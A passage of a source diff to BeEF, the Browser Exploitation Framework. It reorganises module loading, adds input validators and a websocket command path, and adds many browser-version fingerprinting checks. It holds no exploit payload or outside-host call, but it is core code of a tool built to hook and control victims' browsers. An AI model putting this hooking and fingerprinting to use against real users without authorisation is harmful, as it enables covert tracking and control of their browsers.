-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -0,0 +1,49 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+
+  end
+end
+
+## @note Include the BeEF router
+require 'core/main/router/router'
+require 'core/main/router/api'
+
+
+## @note Include http server functions for beef
+require 'core/main/server'
+require 'core/main/handlers/modules/beefjs'
+require 'core/main/handlers/modules/command'
+require 'core/main/handlers/commands'
+require 'core/main/handlers/hookedbrowsers'
+require 'core/main/handlers/browserdetails'
+
+# @note Include the network stack
+require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/assethandler'
+require 'core/main/network_stack/api'
+
+# @note Include the distributed engine
+require 'core/main/distributed_engine/models/rules'
+
+## @note Include helpers
+require 'core/module'
+require 'core/modules'
+require 'core/extension'
+require 'core/extensions'
+require 'core/hbmanager'
+
+## @note Include RESTful API
+require 'core/main/rest/handlers/hookedbrowsers'
+require 'core/main/rest/handlers/modules'
+require 'core/main/rest/handlers/categories'
+require 'core/main/rest/handlers/logs'
+require 'core/main/rest/handlers/admin'
+require 'core/main/rest/api'
+
+## @note Include Websocket
+require 'core/main/network_stack/websocket/websocket'
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -26,16 +16,15 @@ require 'core/main/models/hookedbrowser'
 require 'core/main/models/log'
 require 'core/main/models/command'
 require 'core/main/models/result'
-require 'core/main/models/dynamiccommandinfo'
-require 'core/main/models/dynamicpayloadinfo'
-require 'core/main/models/dynamicpayloads'
 require 'core/main/models/optioncache'
+require 'core/main/models/browserdetails'

 # @note Include the constants
 require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
 require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
+require 'core/main/constants/hardware'

 # @note Include core modules for beef
 require 'core/main/configuration'
@@ -44,20 +33,8 @@ require 'core/main/crypto'
 require 'core/main/logger'
 require 'core/main/migration'

-# @note Include http server functions for beef
-require 'core/main/server'
+# @note Include the command line parser and the banner printer
+require 'core/main/console/commandline'
+require 'core/main/console/banners'

-require 'core/main/handlers/modules/beefjs'
-require 'core/main/handlers/modules/command'
-
-require 'core/main/handlers/commands'
-require 'core/main/handlers/hookedbrowsers'
-
-# @note Include the network stack
-require 'core/main/network_stack/handlers/dynamicreconstruction'
-require 'core/main/network_stack/assethandler'
-require 'core/main/network_stack/api'
-
-# @note Include the distributed engine
-require 'core/main/distributed_engine/models/rules'

--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Extension
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Extensions
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Filters
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
@@ -47,6 +37,16 @@ module Filters
    true
  end

+  # Check the Hardware name value - for example, 'iPhone'
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid Hardware name characters
+  def self.is_valid_hwname?(str)
+    return false if not is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length < 2
+    true
+  end
+
  # Verify the browser version string is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser version characters
@@ -78,10 +78,10 @@ module Filters
    true
  end

-  # Verify the screen params are valid
+  # Verify the screen size is valid
  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid screen param characters
-  def self.is_valid_screen_params?(str)
+  # @return [Boolean] If the string has valid screen size characters
+  def self.is_valid_screen_size?(str)
    return false if has_non_printable_char?(str)    
    return false if str.length > 200
    true
@@ -105,6 +105,15 @@ module Filters
    true
  end

+  # Verify the date stamp is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid date stamp characters
+  def self.is_valid_date_stamp?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
  # Verify the browser_plugins string is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser plugin characters
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF  
 module Filters
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module HBManager
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.

 # @note Include here all the gems we are using
 require 'rubygems'
@@ -38,11 +29,4 @@ require 'core/api'
 require 'core/settings'

 # @note Include the core of BeEF
-require 'core/core'
-
-# @note Include helpers
-require 'core/module'
-require 'core/modules'
-require 'core/extension'
-require 'core/extensions'
-require 'core/hbmanager'
+require 'core/core'
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -0,0 +1,16 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.are = {
+  init:function(){
+   var Jools = require('jools');
+   this.ruleEngine = new Jools();
+  },
+  rules:[],
+  commands:[],
+  results:[]
+};
+beef.regCmp("beef.are");
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * BeEF JS Library <%= @beef_version %>
 * http://beef.googlecode.com/
@@ -48,9 +39,15 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		 * @param: {Function} the function to execute.
 		 */
 		execute: function(fn) {
-			this.commands.push(fn);
-		},
-		
+            if ( typeof  beef.websocket == "undefined"){
+                 this.commands.push(fn);
+            }else{
+                fn();
+            }
+        },
+
+
+
 		/**
 		 * Registers a component in BeEF JS.
 		 * @params: {String} the component.
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
 * @literal object: beef.browser
 *
@@ -48,9 +39,8 @@ beef.browser = {
 	 * Returns true if IE8.
 	 * @example: beef.browser.isIE8()
 	 */
-	isIE8: function() {						
-		$j("body").append('<!--[if IE 8]>     <div id="beefiecheck" class="ie ie8"></div>      <![endif]-->');
-		return ($j('#beefiecheck').hasClass('ie8'))?true:false;
+	isIE8: function() {
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
 	},
 	
 	/**
@@ -58,16 +48,25 @@ beef.browser = {
 	 * @example: beef.browser.isIE9()
 	 */
 	isIE9: function() {
-		$j("body").append('<!--[if IE 9]>     <div id="beefiecheck" class="ie ie9"></div>      <![endif]-->');
-		return ($j('#beefiecheck').hasClass('ie9'))?true:false;
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
 	},
 	
+	/**
+	 *
+	 * Returns true if IE10.
+	 * @example: beef.browser.isIE10()
+	 */
+	 // placeholder
+	isIE10: function() {
+		return false;
+	},
+
 	/**
 	 * Returns true if IE.
 	 * @example: beef.browser.isIE()
 	 */
 	isIE: function() {
-		return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9();
+		return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10();
 	},
 	
 	/**
@@ -158,12 +157,60 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
 	},

+	/**
+	 * Returns true if FF11.
+	 * @example: beef.browser.isFF11()
+	 */
+	isFF11: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
+	},
+
+	/**
+	 * Returns true if FF12
+	 * @example: beef.browser.isFF12()
+	 */
+	isFF12: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
+	},
+
+	/**
+	 * Returns true if FF13
+	 * @example: beef.browser.isFF13()
+	 */
+	isFF13: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
+	},
+
+	/**
+	 * Returns true if FF14
+	 * @example: beef.browser.isFF14()
+	 */
+	isFF14: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
+	},
+
+	/**
+	 * Returns true if FF15
+	 * @example: beef.browser.isFF15()
+	 */
+	isFF15: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
+	},
+
+	/**
+	 * Returns true if FF16
+	 * @example: beef.browser.isFF16()
+	 */
+	isFF16: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16();
 	},

 	/**
@@ -171,7 +218,7 @@ beef.browser = {
 	 * @example: beef.browser.isS4()
 	 */
 	isS4: function() {
-		return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+		return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
 	},
 	
 	/**
@@ -179,7 +226,15 @@ beef.browser = {
 	 * @example: beef.browser.isS5()
 	 */
 	isS5: function() {
-		return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+		return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+	},
+
+	/**
+ 	 * Returns true if Safari 6.xx
+	 * @example: beef.browser.isS6()
+	 */
+	isS6: function() {
+		return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
 	},
 	
 	/**
@@ -187,7 +242,7 @@ beef.browser = {
 	 * @example: beef.browser.isS()
 	 */
 	isS: function() {
-		return this.isS4() || this.isS5() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+		return this.isS4() || this.isS5() || this.isS6();
 	},

 	/**
@@ -294,12 +349,52 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
    },

+	/**
+	 * Returns true if Chrome 18.
+	 * @example: beef.browser.isC18()
+	 */
+	isC18: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
+	},
+
+	/**
+	 * Returns true if Chrome 19.
+	 * @example: beef.browser.isC19()
+	 */
+	isC19: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
+	},
+
+	/**
+	 * Returns true if Chrome 20.
+	 * @example: beef.browser.isC20()
+	 */
+	isC20: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false);
+	},
+
+    /**
+     * Returns true if Chrome 21.
+     * @example: beef.browser.isC21()
+     */
+    isC21: function() {
+        return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
+    },
+
+	/**
+	 * Returns true if Chrome 22.
+	 * @example: beef.browser.isC22()
+	 */
+	isC22: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
+	},
+
 	/**
 	 * Returns true if Chrome.
 	 * @example: beef.browser.isC()
 	 */
 	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
+		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22();
 	},

 	/**
@@ -334,12 +429,20 @@ beef.browser = {
           return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
       },

+        /**
+         * Returns true if Opera 12.xx.
+         * @example: beef.browser.isO12()
+         */
+        isO12: function() {
+            return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
+        },
+
 	/**
 	 * Returns true if Opera.
 	 * @example: beef.browser.isO()
 	 */
 	isO: function() {
-		return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11();
+		return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
 	},
 		
 	/**
@@ -363,7 +466,12 @@ beef.browser = {
 			C14:	this.isC14(),	// Chrome 14
 			C15:    this.isC15(),   // Chrome 15
 			C16:	this.isC16(),	// Chrome 16
-            C17:	this.isC17(),	// Chrome 16
+			C17:	this.isC17(),	// Chrome 17
+			C18:	this.isC18(),	// Chrome 18
+			C19:	this.isC19(),	// Chrome 19
+			C20:	this.isC20(),	// Chrome 20
+			C21:	this.isC21(),	// Chrome 21
+			C22:	this.isC22(),	// Chrome 22
 			C:	this.isC(), 	// Chrome any version

 			FF2:	this.isFF2(),	// Firefox 2
@@ -377,22 +485,31 @@ beef.browser = {
 			FF8:	this.isFF8(),	// Firefox 8
 			FF9:	this.isFF9(),	// Firefox 9
 			FF10:	this.isFF10(),	// Firefox 10
+			FF11:	this.isFF11(),	// Firefox 11
+			FF12:	this.isFF12(),	// Firefox 12
+			FF13:	this.isFF13(),	// Firefox 13
+			FF14:	this.isFF14(),	// Firefox 14
+			FF15:	this.isFF15(),	// Firefox 15
+			FF16:	this.isFF16(),	// Firefox 16
 			FF:	this.isFF(),	// Firefox any version

 			IE6:	this.isIE6(),	// Internet Explorer 6
 			IE7:	this.isIE7(),	// Internet Explorer 7
 			IE8:	this.isIE8(),	// Internet Explorer 8
 			IE9:	this.isIE9(),	// Internet Explorer 9
+			IE10:	this.isIE10(),	// Internet Explorer 10
 			IE:	this.isIE(),	// Internet Explorer any version

 			O9_52:  this.isO9_52(), // Opera 9.50 through 9.52
 			O9_60:  this.isO9_60(), // Opera 9.60 through 9.64
 			O10:    this.isO10(),  	// Opera 10.xx
 			O11:    this.isO11(),  	// Opera 11.xx
+			O12:    this.isO12(),  	// Opera 11.xx
 			O:      this.isO(), 	// Opera any version

 			S4:	this.isS4(),	// Safari 4.xx
 			S5:	this.isS5(),	// Safari 5.xx
+			S6:	this.isS6(),	// Safari 6.x
 			S:	this.isS()	// Safari any version
 		}
 	},
@@ -417,8 +534,12 @@ beef.browser = {
 		if (this.isC14())	{ return '14' }; 	// Chrome 14
 		if (this.isC15())	{ return '15' }; 	// Chrome 15
 		if (this.isC16())	{ return '16' };	// Chrome 16
-        if (this.isC17())	{ return '17' };	// Chrome 17
-
+		if (this.isC17())	{ return '17' };	// Chrome 17
+		if (this.isC18())	{ return '18' };	// Chrome 18
+		if (this.isC19())	{ return '19' };	// Chrome 19
